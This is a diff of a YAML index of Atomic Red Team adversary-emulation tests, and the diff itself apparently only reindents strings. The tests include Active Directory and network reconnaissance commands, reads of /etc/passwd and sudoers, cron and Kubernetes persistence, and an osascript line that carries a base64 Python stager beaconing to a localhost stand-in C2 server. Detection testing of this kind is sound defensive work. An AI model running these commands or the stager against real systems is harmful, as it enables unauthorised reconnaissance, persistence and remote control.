         command: "#{adfind_path} -f (objectcategory=organizationalUnit)\n"
         name: command_prompt
@@ -51408,14 +51408,14 @@ discovery:
       dependencies:
       - description: 'AdFind.exe must exist on disk at specified location (#{adfind_path})
 
-          '
+'
         prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
 
-          '
+'
         get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe"
           -OutFile #{adfind_path}
 
-          '
+'
       executor:
         command: "#{adfind_path} -gcb -sc trustdmp\n"
         name: command_prompt
@@ -51549,7 +51549,7 @@ discovery:
       description: 'Find or discover files on the file system. Upon execution, file
         and folder information will be displayed.
 
-        '
+'
       supported_platforms:
       - windows
       executor:
@@ -51588,13 +51588,13 @@ discovery:
           which sh
         cleanup_command: 'rm #{output_file}
 
-          '
+'
         name: sh
     - name: Nix File and Directory Discovery 2
       auto_generated_guid: 13c5e1ae-605b-46c4-a79f-db28c77ff24e
       description: 'Find or discover files on the file system
 
-        '
+'
       supported_platforms:
       - macos
       - linux
@@ -51700,7 +51700,7 @@ discovery:
       auto_generated_guid: f8aab3dd-5990-4bf8-b8ab-2226c951696f
       description: 'Enumerate all accounts by copying /etc/passwd to another file
 
-        '
+'
       supported_platforms:
       - linux
       input_arguments:
@@ -51714,7 +51714,7 @@ discovery:
           cat #{output_file}
         cleanup_command: 'rm -f #{output_file}
 
-          '
+'
         name: sh
     - name: View sudoers access
       auto_generated_guid: fed9be70-0186-4bde-9f8a-20945f9370c2
@@ -51733,14 +51733,14 @@ discovery:
           cat #{output_file}
         cleanup_command: 'rm -f #{output_file}
 
-          '
+'
         name: sh
         elevation_required: true
     - name: View accounts with UID 0
       auto_generated_guid: c955a599-3653-4fe5-b631-f11c00eb0397
       description: 'View accounts with UID 0
 
-        '
+'
       supported_platforms:
       - linux
       - macos
@@ -51755,26 +51755,26 @@ discovery:
           cat #{output_file} 2>/dev/null
         cleanup_command: 'rm -f #{output_file} 2>/dev/null
 
-          '
+'
         name: sh
     - name: List opened files by user
       auto_generated_guid: 7e46c7a5-0142-45be-a858-1a3ecb4fd3cb
       description: 'List opened files by user
 
-        '
+'
       supported_platforms:
       - linux
       - macos
       executor:
         command: 'username=$(id -u -n) && lsof -u $username
 
-          '
+'
         name: sh
     - name: Show if a user account has ever logged in remotely
       auto_generated_guid: 0f0b6a29-08c3-44ad-a30b-47fd996b2110
       description: 'Show if a user account has ever logged in remotely
 
-        '
+'
       supported_platforms:
       - linux
       input_arguments:
@@ -51786,28 +51786,28 @@ discovery:
       dependencies:
       - description: 'Check if lastlog command exists on the machine
 
-          '
+'
         prereq_command: 'if [ -x "$(command -v lastlog)" ]; then exit 0; else exit
           1;
 
-          '
+'
         get_prereq_command: 'echo "Install lastlog on the machine to run the test.";
           exit 1;
 
-          '
+'
       executor:
         command: |
           lastlog > #{output_file}
           cat #{output_file}
         cleanup_command: 'rm -f #{output_file}
 
-          '
+'
         name: sh
     - name: Enumerate users and groups
       auto_generated_guid: e6f36545-dc1e-47f0-9f48-7f730f54a02e
       description: 'Utilize groups and id to enumerate users and groups
 
-        '
+'
       supported_platforms:
       - linux
       - macos
@@ -51820,7 +51820,7 @@ discovery:
       auto_generated_guid: 319e9f6c-7a9e-432e-8c62-9385c803b6f2
       description: 'Utilize local utilities to enumerate users and groups
 
-        '
+'
       supported_platforms:
       - macos
       executor:
@@ -51851,7 +51851,7 @@ discovery:
       description: 'Enumerate all accounts via PowerShell. Upon execution, lots of
         user account and group information will be displayed.
 
-        '
+'
       supported_platforms:
       - windows
       executor:
@@ -51871,26 +51871,26 @@ discovery:
       description: 'Enumerate logged on users. Upon exeuction, logged on users will
         be displayed.
 
-        '
+'
       supported_platforms:
       - windows
       executor:
         command: 'query user
 
-          '
+'
         name: command_prompt
     - name: Enumerate logged on users via PowerShell
       auto_generated_guid: 2bdc42c7-8907-40c2-9c2b-42919a00fe03
       description: 'Enumerate logged on users via PowerShell. Upon exeuction, logged
         on users will be displayed.
 
-        '
+'
       supported_platforms:
       - windows
       executor:
         command: 'query user
 
-          '
+'
         name: powershell
   T1069.001:
     technique:
@@ -51934,7 +51934,7 @@ discovery:
       auto_generated_guid: 952931a4-af0b-4335-bbbe-73c8c5b327ae
       description: 'Permission Groups Discovery
 
-        '
+'
       supported_platforms:
       - macos
       - linux
@@ -52062,15 +52062,15 @@ discovery:
       dependencies:
       - description: 'Check if nmap command exists on the machine
 
-          '
+'
         prereq_command: 'if [ -x "$(command -v nmap)" ]; then exit 0; else exit 1;
           fi;
 
-          '
+'
         get_prereq_command: 'echo "Install nmap on the machine to run the test.";
           exit 1;
 
-          '
+'
       executor:
         command: |
           nmap -sS #{network_range} -p #{port}
@@ -52095,7 +52095,7 @@ discovery:
       dependencies:
       - description: 'NMap must be installed
 
-          '
+'
         prereq_command: if (cmd /c "nmap 2>nul") {exit 0} else {exit 1}
         get_prereq_command: |
           Invoke-WebRequest -OutFile $env:temp\nmap-7.80-setup.exe #{nmap_url}
@@ -52108,7 +52108,7 @@ discovery:
       auto_generated_guid: 6ca45b04-9f15-4424-b9d3-84a217285a5c
       description: 'Scan ports to check for listening ports with python
 
-        '
+'
       supported_platforms:
       - windows
       input_arguments:
@@ -52124,17 +52124,17 @@ discovery:
       dependencies:
       - description: 'Check if python exists on the machine
 
-          '
+'
         prereq_command: 'if (python --version) {exit 0} else {exit 1}
 
-          '
+'
         get_prereq_command: 'echo "Python 3 must be installed manually"
 
-          '
+'
       executor:
         command: 'python #{filename} -i #{host_ip}
 
-          '
+'
         name: powershell
   T1135:
     technique:
@@ -52198,7 +52198,7 @@ discovery:
       auto_generated_guid: f94b5ad9-911c-4eff-9718-fd21899db4f7
       description: 'Network Share Discovery
 
-        '
+'
       supported_platforms:
       - macos
       input_arguments:
@@ -52216,7 +52216,7 @@ discovery:
       auto_generated_guid: 875805bc-9e86-4e87-be86-3a5527315cae
       description: 'Network Share Discovery using smbstatus
 
-        '
+'
       supported_platforms:
       - linux
       input_arguments:
@@ -52232,16 +52232,16 @@ discovery:
       dependencies:
       - description: 'Package with smbstatus (samba) must exist on device
 
-          '
+'
         prereq_command: 'if #{package_checker} > /dev/null; then exit 0; else exit
           1; fi
 
-          '
+'
         get_prereq_command: "sudo #{package_installer} \n"
       executor:
         command: 'smbstatus --shares
 
-          '
+'
         name: bash
         elevation_required: true
     - name: Network Share Discovery command prompt
@@ -52259,7 +52259,7 @@ discovery:
       executor:
         command: 'net view \\#{computer_name}
 
-          '
+'
         name: command_prompt
     - name: Network Share Discovery PowerShell
       auto_generated_guid: 1b0814d1-bb24-402d-9615-1b20c50733fb
@@ -52271,7 +52271,7 @@ discovery:
       executor:
         command: 'get-smbshare
 
-          '
+'
         name: powershell
     - name: View available share drives
       auto_generated_guid: ab39a04f-0c93-4540-9ff2-83f862c385ae
@@ -52283,28 +52283,28 @@ discovery:
       executor:
         command: 'net share
 
-          '
+'
         name: command_prompt
     - name: Share Discovery with PowerView
       auto_generated_guid: b1636f0a-ba82-435c-b699-0d78794d8bfd
       description: 'Enumerate Domain Shares the current user has access. Upon execution,
         progress info about each share being scanned will be displayed.
 
-        '
+'
       supported_platforms:
       - windows
       dependency_executor_name: powershell
       dependencies:
       - description: 'Endpoint must be joined to domain
 
-          '
+'
         prereq_command: 'if ((Get-WmiObject -Class Win32_ComputerSystem).PartofDomain)
           {exit 0} else {exit 1}
 
-          '
+'
         get_prereq_command: '"Join system to domain"
 
-          '
+'
       executor:
         command: |
           [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
@@ -52381,15 +52381,15 @@ discovery:
       dependencies:
       - description: 'Check if at least one of the tools are installed on the machine.
 
-          '
+'
         prereq_command: 'if [ ! -x "$(command -v tcpdump)" ] && [ ! -x "$(command
           -v tshark)" ]; then exit 1; else exit 0; fi;
 
-          '
+'
         get_prereq_command: 'echo "Install tcpdump and/or tshark for the test to run.";
           exit 1;
 
-          '
+'
       executor:
         command: |
           tcpdump -c 5 -nnni #{interface}
@@ -52413,15 +52413,15 @@ discovery:
       dependencies:
       - description: 'Check if at least one of the tools are installed on the machine.
 
-          '
+'
         prereq_command: 'if [ ! -x "$(command -v tcpdump)" ] && [ ! -x "$(command
           -v tshark)" ]; then exit 1; else exit 0; fi;
 
-          '
+'
         get_prereq_command: 'echo "Install tcpdump and/or tshark for the test to run.";
           exit 1;
 
-          '
+'
       executor:
         command: "sudo tcpdump -c 5 -nnni #{interface}    \nif [ -x \"$(command -v
           tshark)\" ]; then sudo tshark -c 5 -i #{interface}; fi;\n"
@@ -52462,14 +52462,14 @@ discovery:
       - description: 'tshark must be installed and in the default path of "c:\Program
           Files\Wireshark\Tshark.exe".
 
-          '
+'
         prereq_command: if (test-path "#{tshark_path}") {exit 0} else {exit 1}
         get_prereq_command: |
           Invoke-WebRequest -OutFile $env:temp\wireshark_installer.exe #{wireshark_url}
           Start-Process $env:temp\wireshark_installer.exe /S
       - description: 'npcap must be installed.
 
-          '
+'
         prereq_command: if (test-path "#{npcap_path}") {exit 0} else {exit 1}
         get_prereq_command: |
           Invoke-WebRequest -OutFile $env:temp\npcap_installer.exe #{npcap_url}
@@ -52477,7 +52477,7 @@ discovery:
       executor:
         command: '"c:\Program Files\Wireshark\tshark.exe" -i #{interface} -c 5
 
-          '
+'
         name: command_prompt
         elevation_required: true
     - name: Windows Internal Packet Capture
@@ -52550,57 +52550,57 @@ discovery:
       auto_generated_guid: '085fe567-ac84-47c7-ac4c-2688ce28265b'
       description: 'Lists the password complexity policy to console on Ubuntu Linux.
 
-        '
+'
       supported_platforms:
       - linux
       executor:
         command: 'cat /etc/pam.d/common-password
 
-          '
+'
         name: bash
     - name: Examine password complexity policy - CentOS/RHEL 7.x
       auto_generated_guid: 78a12e65-efff-4617-bc01-88f17d71315d
       description: 'Lists the password complexity policy to console on CentOS/RHEL
         7.x Linux.
 
-        '
+'
       supported_platforms:
       - linux
       dependencies:
       - description: 'System must be CentOS or RHEL v7
 
-          '
+'
         prereq_command: 'if [ $(rpm -q --queryformat ''%{VERSION}'') -eq "7" ]; then
           exit /b 0; else exit /b 1; fi;
 
-          '
+'
         get_prereq_command: 'echo Please run from CentOS or RHEL v7
 
-          '
+'
       executor:
         command: 'cat /etc/security/pwquality.conf
 
-          '
+'
         name: bash
     - name: Examine password complexity policy - CentOS/RHEL 6.x
       auto_generated_guid: 6ce12552-0adb-4f56-89ff-95ce268f6358
       description: 'Lists the password complexity policy to console on CentOS/RHEL
         6.x Linux.
 
-        '
+'
       supported_platforms:
       - linux
       dependencies:
       - description: 'System must be CentOS or RHEL v6
 
-          '
+'
         prereq_command: 'if [ $(rpm -q --queryformat ''%{VERSION}'') -eq "6" ]; then
           exit /b 0; else exit /b 1; fi;
 
-          '
+'
         get_prereq_command: 'echo Please run from CentOS or RHEL v6
 
-          '
+'
       executor:
         command: |
           cat /etc/pam.d/system-auth
@@ -52610,43 +52610,43 @@ discovery:
       auto_generated_guid: 7c86c55c-70fa-4a05-83c9-3aa19b145d1a
       description: 'Lists the password expiration policy to console on CentOS/RHEL/Ubuntu.
 
-        '
+'
       supported_platforms:
       - linux
       executor:
         command: 'cat /etc/login.defs
 
-          '
+'
         name: bash
     - name: Examine local password policy - Windows
       auto_generated_guid: 4588d243-f24e-4549-b2e3-e627acc089f6
       description: 'Lists the local password policy to console on Windows.
 
-        '
+'
       supported_platforms:
       - windows
       executor:
         command: 'net accounts
 
-          '
+'
         name: command_prompt
     - name: Examine domain password policy - Windows
       auto_generated_guid: 46c2c362-2679-4ef5-aec9-0e958e135be4
       description: 'Lists the domain password policy to console on Windows.
 
-        '
+'
       supported_platforms:
       - windows
       executor:
         command: 'net accounts /domain
 
-          '
+'
         name: command_prompt
     - name: Examine password policy - macOS
       auto_generated_guid: 4b7fa042-9482-45e1-b348-4b756b2a0742
       description: 'Lists the password policy to console on macOS.
 
-        '
+'
       supported_platforms:
       - macos
       executor:
@@ -52825,7 +52825,7 @@ discovery:
           ps aux >> #{output_file}
         cleanup_command: 'rm #{output_file}
 
-          '
+'
         name: sh
     - name: Process Discovery - tasklist
       auto_generated_guid: c5806a4f-62b8-4900-980b-c7ec004e9908
@@ -52837,7 +52837,7 @@ discovery:
       executor:
         command: 'tasklist
 
-          '
+'
         name: command_prompt
   T1012:
     technique:
@@ -53005,7 +53005,7 @@ discovery:
       executor:
         command: 'net group "Domain Computers" /domain
 
-          '
+'
         name: command_prompt
     - name: Remote System Discovery - nltest
       auto_generated_guid: 52ab5108-3f6f-42fb-8ba3-73bc054f22c8
@@ -53023,7 +53023,7 @@ discovery:
       executor:
         command: 'nltest.exe /dclist:#{target_domain}
 
-          '
+'
         name: command_prompt
     - name: Remote System Discovery - ping sweep
       auto_generated_guid: 6db1f57f-d1d5-4223-8a66-55c9c65a9592
@@ -53036,7 +53036,7 @@ discovery:
       executor:
         command: 'for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i
 
-          '
+'
         name: command_prompt
     - name: Remote System Discovery - arp
       auto_generated_guid: 2d5a61f5-0447-4be4-944a-1f8530ed6574
@@ -53047,7 +53047,7 @@ discovery:
       executor:
         command: 'arp -a
 
-          '
+'
         name: command_prompt
     - name: Remote System Discovery - arp nix
       auto_generated_guid: acb6b1ff-e2ad-4d64-806c-6c35fe73b951
@@ -53062,18 +53062,18 @@ discovery:
       dependencies:
       - description: 'Check if arp command exists on the machine
 
-          '
+'
         prereq_command: 'if [ -x "$(command -v arp)" ]; then exit 0; else exit 1;
           fi;
 
-          '
+'
         get_prereq_command: 'echo "Install arp on the machine."; exit 1;
 
-          '
+'
       executor:
         command: 'arp -a | grep -v ''^?''
 
-          '
+'
         name: sh
     - name: Remote System Discovery - sweep
       auto_generated_guid: 96db2632-8417-4dbb-b8bb-a8b92ba391de
@@ -53101,7 +53101,7 @@ discovery:
         command: 'for ip in $(seq #{start_host} #{stop_host}); do ping -c 1 #{subnet}.$ip;
           [ $? -eq 0 ] && echo "#{subnet}.$ip UP" || : ; done
 
-          '
+'
         name: sh
     - name: Remote System Discovery - nslookup
       auto_generated_guid: baa01aaa-5e13-45ec-8a0d-e46c93c9760f
@@ -53146,35 +53146,35 @@ discovery:
       dependencies:
       - description: 'Computer must have python 3 installed
 
-          '
+'
         prereq_command: 'if (python --version) {exit 0} else {exit 1}
 
-          '
+'
         get_prereq_command: 'echo "Python 3 must be installed manually"
 
-          '
+'
       - description: 'Computer must have pip installed
 
-          '
+'
         prereq_command: 'if (pip3 -V) {exit 0} else {exit 1}
 
-          '
+'
         get_prereq_command: 'echo "PIP must be installed manually"
 
-          '
+'
       - description: 'adidnsdump must be installed and part of PATH
 
-          '
+'
         prereq_command: 'if (cmd /c adidnsdump -h) {exit 0} else {exit 1}
 
-          '
+'
         get_prereq_command: 'pip3 install adidnsdump
 
-          '
+'
       executor:
         command: 'adidnsdump -u #{user_name} -p #{acct_pass} --print-zones #{host_name}
 
-          '
+'
         name: command_prompt
         elevation_required: true
     - name: Adfind - Enumerate Active Directory Computer Objects
@@ -53193,14 +53193,14 @@ discovery:
       dependencies:
       - description: 'AdFind.exe must exist on disk at specified location (#{adfind_path})
 
-          '
+'
         prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
 
-          '
+'
         get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe"
           -OutFile #{adfind_path}
 
-          '
+'
       executor:
         command: "#{adfind_path} -f (objectcategory=computer)\n"
         name: command_prompt
@@ -53220,14 +53220,14 @@ discovery:
       dependencies:
       - description: 'AdFind.exe must exist on disk at specified location (#{adfind_path})
 
-          '
+'
         prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
 
-          '
+'
         get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe"
           -OutFile #{adfind_path}
 
-          '
+'
       executor:
         command: "#{adfind_path} -sc dclist\n"
         name: command_prompt
@@ -53331,7 +53331,7 @@ discovery:
       executor:
         command: 'ps aux | egrep ''Little\ Snitch|CbOsxSensorService|falcond|nessusd|santad|CbDefense|td-agent|packetbeat|filebeat|auditbeat|osqueryd|BlockBlock|LuLu''
 
-          '
+'
         name: sh
     - name: Security Software Discovery - ps (Linux)
       auto_generated_guid: 23b91cd2-c99c-4002-9e41-317c63e024a2
@@ -53343,7 +53343,7 @@ discovery:
       executor:
         command: 'ps aux | egrep ''falcond|nessusd|cbagentd|td-agent|packetbeat|filebeat|auditbeat|osqueryd''
 
-          '
+'
         name: sh
     - name: Security Software Discovery - Sysmon Service
       auto_generated_guid: fe613cf3-8009-4446-9a0f-bc78a15b66c9
@@ -53356,7 +53356,7 @@ discovery:
       executor:
         command: 'fltmc.exe | findstr.exe 385201
 
-          '
+'
         name: command_prompt
         elevation_required: true
     - name: Security Software Discovery - AV Discovery via WMI
@@ -53433,7 +53433,7 @@ discovery:
         command: 'reg query "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer"
           /v svcVersion
 
-          '
+'
         name: command_prompt
     - name: Applications Installed
       auto_generated_guid: c49978f6-bd6e-4221-ad2c-9e3e30cc1e3b
@@ -53453,7 +53453,7 @@ discovery:
         software that is installed on the system. Adversaries may use the information
         from Software Discovery during automated discovery to shape follow-on behaviors
 
-        '
+'
       supported_platforms:
       - macos
       executor:
@@ -53562,7 +53562,7 @@ discovery:
           | grep -iE ''Oracle|VirtualBox|VMWare|Parallels'') then echo "Virtualization
           Environment detected"; fi;
 
-          '
+'
     - name: Detect Virtualization Environment (Windows)
       auto_generated_guid: 502a7dc4-9d6f-4d28-abf2-f0e84692562d
       description: 'Windows Management Instrumentation(WMI) objects contains system
@@ -53572,7 +53572,7 @@ discovery:
         This is meant to find the result of Not supported, which is the result if
         run in a virtual machine
 
-        '
+'
       supported_platforms:
       - windows
       executor:
@@ -53589,7 +53589,7 @@ discovery:
         the system. If it''s a virtual machine, one of the device manufacturer will
         be a Virtualization Software.
 
-        '
+'
       supported_platforms:
       - macos
       executor:
@@ -53599,7 +53599,7 @@ discovery:
           ''Oracle|VirtualBox|VMWare|Parallels'') then echo ''Virtualization Environment
           detected''; fi;
 
-          '
+'
   T1082:
     technique:
       object_marking_refs:
@@ -53667,7 +53667,7 @@ discovery:
       description: 'Identify System Info. Upon execution, system info and time info
         will be displayed.
 
-        '
+'
       supported_platforms:
       - windows
       executor:
@@ -53679,7 +53679,7 @@ discovery:
       auto_generated_guid: edff98ec-0f73-4f63-9890-6b117092aff6
       description: 'Identify System Info
 
-        '
+'
       supported_platforms:
       - macos
       executor:
@@ -53691,7 +53691,7 @@ discovery:
       auto_generated_guid: cccb070c-df86-4216-a5bc-9fb60c74e27c
       description: 'Identify System Info
 
-        '
+'
       supported_platforms:
       - linux
       - macos
@@ -53708,14 +53708,14 @@ discovery:
           #{output_file} 2>/dev/null\n"
         cleanup_command: 'rm #{output_file} 2>/dev/null
 
-          '
+'
         name: sh
     - name: Linux VM Check via Hardware
       auto_generated_guid: 31dad7ad-2286-4c02-ae92-274418c85fec
       description: 'Identify virtual machine hardware. This technique is used by the
         Pupy RAT and other malware.
 
-        '
+'
       supported_platforms:
       - linux
       executor:
@@ -53734,7 +53734,7 @@ discovery:
       description: 'Identify virtual machine guest kernel modules. This technique
         is used by the Pupy RAT and other malware.
 
-        '
+'
       supported_platforms:
       - linux
       executor:
@@ -53750,40 +53750,40 @@ discovery:
       description: 'Identify system hostname for Windows. Upon execution, the hostname
         of the device will be displayed.
 
-        '
+'
       supported_platforms:
       - windows
       executor:
         command: 'hostname
 
-          '
+'
         name: command_prompt
     - name: Hostname Discovery
       auto_generated_guid: 486e88ea-4f56-470f-9b57-3f4d73f39133
       description: 'Identify system hostname for Linux and macOS systems.
 
-        '
+'
       supported_platforms:
       - linux
       - macos
       executor:
         command: 'hostname
 
-          '
+'
         name: bash
     - name: Windows MachineGUID Discovery
       auto_generated_guid: 224b4daf-db44-404e-b6b2-f4d1f0126ef8
       description: 'Identify the Windows MachineGUID value for a system. Upon execution,
         the machine GUID will be displayed from registry.
 
-        '
+'
       supported_platforms:
       - windows
       executor:
         command: 'REG QUERY HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography /v
           MachineGuid
 
-          '
+'
         name: command_prompt
     - name: Griffon Recon
       auto_generated_guid: 69bd4abe-8759-49a6-8d21-0f15822d6370
@@ -53810,27 +53810,27 @@ discovery:
       description: 'Identify all environment variables. Upon execution, environments
         variables and your path info will be displayed.
 
-        '
+'
       supported_platforms:
       - windows
       executor:
         command: 'set
 
-          '
+'
         name: command_prompt
     - name: Environment variables discovery on macos and linux
       auto_generated_guid: fcbdd43f-f4ad-42d5-98f3-0218097e2720
       description: 'Identify all environment variables. Upon execution, environments
         variables and your path info will be displayed.
 
-        '
+'
       supported_platforms:
       - macos
       - linux
       executor:
         command: 'env
 
-          '
+'
         name: sh
   T1614:
     technique:
@@ -53977,7 +53977,7 @@ discovery:
       executor:
         command: 'netsh advfirewall firewall show rule name=all
 
-          '
+'
         name: command_prompt
     - name: System Network Configuration Discovery
       auto_generated_guid: c141bbdb-7fca-4254-9fd6-f47e79447e17
@@ -54037,10 +54037,10 @@ discovery:
       dependencies:
       - description: 'Test requires #{port_file} to exist
 
-          '
+'
         prereq_command: 'if (Test-Path "#{port_file}") {exit 0} else {exit 1}
 
-          '
+'
         get_prereq_command: |
           New-Item -Type Directory (split-path #{port_file}) -ErrorAction ignore | Out-Null
           Invoke-WebRequest "#{portfile_url}" -OutFile "#{port_file}"
@@ -54059,7 +54059,7 @@ discovery:
           | Out-File -Encoding ASCII -append $file\nWrite-Host $results\n"
         cleanup_command: 'Remove-Item -ErrorAction ignore "#{output_file}"
 
-          '
+'
         name: powershell
     - name: Adfind - Enumerate Active Directory Subnet Objects
       auto_generated_guid: 9bb45dd7-c466-4f93-83a1-be30e56033ee
@@ -54077,14 +54077,14 @@ discovery:
       dependencies:
       - description: 'AdFind.exe must exist on disk at specified location (#{adfind_path})
 
-          '
+'
         prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
 
-          '
+'
         get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe"
           -OutFile #{adfind_path}
 
-          '
+'
       executor:
         command: "#{adfind_path} -f (objectcategory=subnet)\n"
         name: command_prompt
@@ -54213,7 +54213,7 @@ discovery:
       executor:
         command: 'Get-NetTCPConnection
 
-          '
+'
         name: powershell
     - name: System Network Connections Discovery Linux & MacOS
       auto_generated_guid: 9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2
@@ -54228,14 +54228,14 @@ discovery:
       dependencies:
       - description: 'Check if netstat command exists on the machine
 
-          '
+'
         prereq_command: 'if [ -x "$(command -v netstat)" ]; then exit 0; else exit
           1; fi;
 
-          '
+'
         get_prereq_command: 'echo "Install netstat on the machine."; exit 1;
 
-          '
+'
       executor:
         command: |
           netstat
@@ -54269,10 +54269,10 @@ discovery:
       dependencies:
       - description: 'Sharpview.exe must exist on disk at specified location (#{SharpView})
 
-          '
+'
         prereq_command: 'if (Test-Path #{SharpView}) {exit 0} else {exit 1}
 
-          '
+'
         get_prereq_command: |
           New-Item -Type Directory (split-path #{SharpView}) -ErrorAction ignore | Out-Null
           Invoke-WebRequest #{SharpView_url} -OutFile "#{SharpView}"
@@ -54451,10 +54451,10 @@ discovery:
       executor:
         command: 'net.exe start >> #{output_file}
 
-          '
+'
         cleanup_command: 'del /f /q /s #{output_file} >nul 2>&1
 
-          '
+'
         name: command_prompt
   T1124:
     technique:
@@ -54521,7 +54521,7 @@ discovery:
       description: 'Identify the system time. Upon execution, the local computer system
         time and timezone will be displayed.
 
-        '
+'
       supported_platforms:
       - windows
       input_arguments:
@@ -54539,13 +54539,13 @@ discovery:
       description: 'Identify the system time via PowerShell. Upon execution, the system
         time will be displayed.
 
-        '
+'
       supported_platforms:
       - windows
       executor:
         command: 'Get-Date
 
-          '
+'
         name: powershell
   T1497.003:
     technique:
@@ -58138,7 +58138,7 @@ execution:
         command: 'osascript -e "do shell script \"echo \\\"import sys,base64,warnings;warnings.filterwarnings(''ignore'');exec(base64.b64decode(''aW1wb3J0IHN5cztpbXBvcnQgcmUsIHN1YnByb2Nlc3M7Y21kID0gInBzIC1lZiB8IGdyZXAgTGl0dGxlXCBTbml0Y2ggfCBncmVwIC12IGdyZXAiCnBzID0gc3VicHJvY2Vzcy5Qb3BlbihjbWQsIHNoZWxsPVRydWUsIHN0ZG91dD1zdWJwcm9jZXNzLlBJUEUpCm91dCA9IHBzLnN0ZG91dC5yZWFkKCkKcHMuc3Rkb3V0LmNsb3NlKCkKaWYgcmUuc2VhcmNoKCJMaXR0bGUgU25pdGNoIiwgb3V0KToKICAgc3lzLmV4aXQoKQppbXBvcnQgdXJsbGliMjsKVUE9J01vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IFRyaWRlbnQvNy4wOyBydjoxMS4wKSBsaWtlIEdlY2tvJztzZXJ2ZXI9J2h0dHA6Ly8xMjcuMC4wLjE6ODAnO3Q9Jy9sb2dpbi9wcm9jZXNzLnBocCc7cmVxPXVybGxpYjIuUmVxdWVzdChzZXJ2ZXIrdCk7CnJlcS5hZGRfaGVhZGVyKCdVc2VyLUFnZW50JyxVQSk7CnJlcS5hZGRfaGVhZGVyKCdDb29raWUnLCJzZXNzaW9uPXQzVmhWT3MvRHlDY0RURnpJS2FuUnhrdmszST0iKTsKcHJveHkgPSB1cmxsaWIyLlByb3h5SGFuZGxlcigpOwpvID0gdXJsbGliMi5idWlsZF9vcGVuZXIocHJveHkpOwp1cmxsaWIyLmluc3RhbGxfb3BlbmVyKG8pOwphPXVybGxpYjIudXJsb3BlbihyZXEsdGltZW91dD0zKS5yZWFkKCk7Cg==''));\\\"
           | python &\""
 
-          '
+'
         name: sh
   T1053.001:
     technique:
@@ -58195,7 +58195,7 @@ execution:
       description: 'This test submits a command to be run in the future by the `at`
         daemon.
 
-        '
+'
       supported_platforms:
       - linux
       input_arguments:
@@ -58211,30 +58211,30 @@ execution:
       dependencies:
       - description: 'The `at` and `atd` executables must exist in the PATH
 
-          '
+'
         prereq_command: 'which at && which atd
 
-          '
+'
         get_prereq_command: 'echo ''Please install `at` and `atd`; they were not found
           in the PATH (Package name: `at`)''
 
-          '
+'
       - description: 'The `atd` daemon must be running
 
-          '
+'
         prereq_command: 'systemctl status atd || service atd status
 
-          '
+'
         get_prereq_command: 'echo ''Please start the `atd` daemon (sysv: `service
           atd start` ; systemd: `systemctl start atd`)''
 
-          '
+'
       executor:
         name: sh
         elevation_required: false
         command: 'echo "#{at_command}" | at #{time_spec}
 
-          '
+'
   T1053.002:
     technique:
       external_references:
@@ -58331,7 +58331,7 @@ execution:
         elevation_required: false
         command: 'at 13:20 /interactive cmd
 
-          '
+'
   T1059:
     technique:
       created: '2017-05-31T21:30:49.546Z'
@@ -58628,7 +58628,7 @@ execution:
         a backdoor container, and run their malicious code remotely by using “kubectl
         exec”.
 
-        '
+'
       supported_platforms:
       - containers
       input_arguments:
@@ -58643,20 +58643,20 @@ execution:
       dependencies:
       - description: 'kubectl must be installed
 
-          '
+'
         get_prereq_command: 'echo "kubectl must be installed manually"
 
-          '
+'
         prereq_command: 'which kubectl
 
-          '
+'
       executor:
         command: |
           kubectl create -f src/busybox.yaml -n #{namespace}
           kubectl exec -n #{namespace} busybox -- #{command}
         cleanup_command: 'kubectl delete pod busybox -n #{namespace}
 
-          '
+'
         name: bash
         elevation_required: false
   T1053.007:
@@ -58725,7 +58725,7 @@ execution:
         CronJob for scheduling execution of malicious code that would run as a container
         in the cluster.
 
-        '
+'
       supported_platforms:
       - containers
       input_arguments:
@@ -58736,17 +58736,17 @@ execution:
       dependencies:
       - description: 'kubectl must be installed
 
-          '
+'
         get_prereq_command: 'echo "kubectl must be installed manually"
 
-          '
+'
         prereq_command: 'which kubectl
 
-          '
+'
       executor:
         command: 'kubectl get cronjobs -n #{namespace}
 
-          '
+'
         name: bash
         elevation_required: false
     - name: CreateCronjob
@@ -58758,7 +58758,7 @@ execution:
         CronJob for scheduling execution of malicious code that would run as a container
         in the cluster.
 
-        '
+'
       supported_platforms:
       - containers
       input_arguments:
@@ -58769,20 +58769,20 @@ execution:
       dependencies:
       - description: 'kubectl must be installed
 
-          '
+'
         get_prereq_command: 'echo "kubectl must be installed manually"
 
-          '
+'
         prereq_command: 'which kubectl
 
-          '
+'
       executor:
         command: 'kubectl create -f src/cronjob.yaml -n #{namespace}
 
-          '
+'
         cleanup_command: 'kubectl delete cronjob art -n #{namespace}
 
-          '
+'
         name: bash
         elevation_required: false
   T1053.003:
@@ -58841,7 +58841,7 @@ execution:
         of the referenced file. This technique was used by numerous IoT automated
         exploitation attacks.
 
-        '
+'
       supported_platforms:
       - macos
       - linux
@@ -58861,7 +58861,7 @@ execution:
           echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron}
         cleanup_command: 'crontab /tmp/notevil
 
-          '
+'
     - name: Cron - Add script to all cron subfolders
       auto_generated_guid: b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0
       description: 'This test adds a script to /etc/cron.hourly, /etc/cron.daily,
@@ -58869,7 +58869,7 @@ execution:
         schedule. This technique was used by the threat actor Rocke during the exploitation
         of Linux web servers.
 
-        '
+'
       supported_platforms:
       - macos
       - linux
@@ -58901,7 +58901,7 @@ execution:
         to execute on a schedule. This technique was used by the threat actor Rocke
         during the exploitation of Linux web servers.
 
-        '
+'
